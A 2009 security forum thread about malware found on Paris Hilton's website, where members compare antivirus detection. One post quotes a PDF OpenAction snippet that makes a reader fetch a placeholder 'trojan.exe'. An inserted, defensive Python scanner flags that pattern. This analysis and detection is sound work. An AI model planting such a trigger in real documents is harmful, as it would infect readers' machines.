Paris Hilton's Web Site Infected With Malware

Discussion in 'malware problems & news' started by HURST, Jan 13, 2009.

Thread Status:
Not open for further replies.
  1. HURST

    HURST Registered Member

    By now more AVs should detect it...
    Anyways, here is the whole article:
    http://www.informationweek.com/news...jhtml?articleID=212800229&cid=RSSfeed_IWK_All
     
  2. emperordarius

    emperordarius Registered Member

    That's what happens to those who like Paris Hilton. :D
     
  3. dw426

    dw426 Registered Member

    That's not hot.
     
  4. aigle

    aigle Registered Member

    Tried Dr.Web Link scanner.
     

  5. The Hammer

    The Hammer Registered Member

    It would have been interesting to know which seven detected the malware.
     
  6. HURST

    HURST Registered Member

    I have a link to a VirusTotal scan.
    Since we are not allowed to post VT screenshots, are we allowed to list those who passed or post the link?

    BTW, aigle, Dr.Web didn't detect it.
     
    Last edited: Jan 13, 2009
  7. Pedro

    Pedro Registered Member

    I think that's the reason it's not allowed. It invites A vs. B and so on.
     
  8. emperordarius

    emperordarius Registered Member

  9. Dark Shadow

    Dark Shadow Registered Member

    Now if it was Eva Longoria, in a two piece swim, it may have been worth the malware.
     
  10. elapsed

    elapsed Registered Member

    Hello, could you PM me a copy of the malware please (the sample not the results). Thanks.
     
  11. GES/POR

    GES/POR Registered Member

    Well done to F-Prot's Eldorado's heuristic (edit. heur or gen?) engine for picking up the rootkit, also Prevx (signature?), Avast (gen. sig.), "McArtemis" (in the cloud tech), Avira (packer detection?), Microsoft (sig.), NOD32 (gen), Panda (gen), VIPRE (HIPS?), VBA32 (default heuristics) :thumb:
     
    Last edited: Jan 13, 2009
  12. HURST

    HURST Registered Member

    I don't have a sample. I just found the link to the results. Also, it's against the forum rules to trade malware.
     
  13. Rmus

    Rmus Exploit Analyst

    From the article:

    This becomes confusing in light of another statement further on:

    A glimpse into the payload:
    Unfortunately, the site has already been cleaned up so we can't test. But the techniques are similar to others that have been analyzed.

    Here is a typical triggering code inside a PDF file, using the URI vulnerability:

    Code:
    ....<< /Type /OpenAction
    /S /URI
    /URI (http://www.some_site.com/trojan.exe)
    
    If the user's PDF reader were vulnerable (not patched) many other solutions would prevent this exploit from executing.

    ----
    rich
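
A defender-side triage check for the trigger pattern shown in the post above, as an added example that is not part of the original thread: it scans raw PDF bytes for URI actions, reports each target, and flags the ones reached from /OpenAction that point at an executable. The function names, the look-back window, the extension list and the sample bytes are assumptions constructed for illustration; it only sees uncompressed objects.

```python
import re

# A URI action: "/S /URI" followed shortly by "/URI (target)".
# Limitation: targets containing an escaped ")" are truncated at that point.
URI_ACTION = re.compile(
    rb"/S\s*/URI\b.{0,200}?/URI\s*\((?P<target>[^)]*)\)", re.DOTALL
)
RISKY_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd")  # assumed list
LOOKBACK = 120  # assumed: bytes before the action searched for /OpenAction

# Constructed sample: an ordinary link annotation, then an open action
# using the placeholder URL from the post.
SAMPLE_PDF = (
    b"4 0 obj\n<< /Type /Annot /Subtype /Link\n"
    b"/A << /S /URI /URI (https://example.org/manual.html) >> >>\nendobj\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R\n"
    b"/OpenAction << /S /URI\n"
    b"/URI (http://www.some_site.com/trojan.exe) >> >>\nendobj\n"
)


def find_uri_actions(pdf_bytes):
    """Return one finding per URI action found in the raw bytes."""
    findings = []
    for m in URI_ACTION.finditer(pdf_bytes):
        target = m.group("target").decode("latin-1")
        context = pdf_bytes[max(0, m.start() - LOOKBACK):m.start()]
        path = target.lower().split("?")[0]  # ignore any query string
        findings.append({
            "offset": m.start(),
            "target": target,
            "on_open": b"/OpenAction" in context,  # heuristic, not a parse
            "risky_target": path.endswith(RISKY_EXT),
        })
    return findings


def is_suspicious(pdf_bytes):
    """True if a URI action fires on open and targets an executable."""
    return any(f["on_open"] and f["risky_target"]
               for f in find_uri_actions(pdf_bytes))


if __name__ == "__main__":
    for finding in find_uri_actions(SAMPLE_PDF):
        print(finding)
    print("suspicious:", is_suspicious(SAMPLE_PDF))
```

A hit is a reason to quarantine the file for closer inspection, not a verdict; a clean result on a PDF with compressed object streams means only that nothing was visible in the raw bytes.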
     
  14. Jin K

    Jin K Registered Member

    VirusTotal owner should change from Kaspersky 7.0 (shitty heuristic) :thumbd: to Kaspersky 8.0!! Most of my samples are not detected with KAV7.
     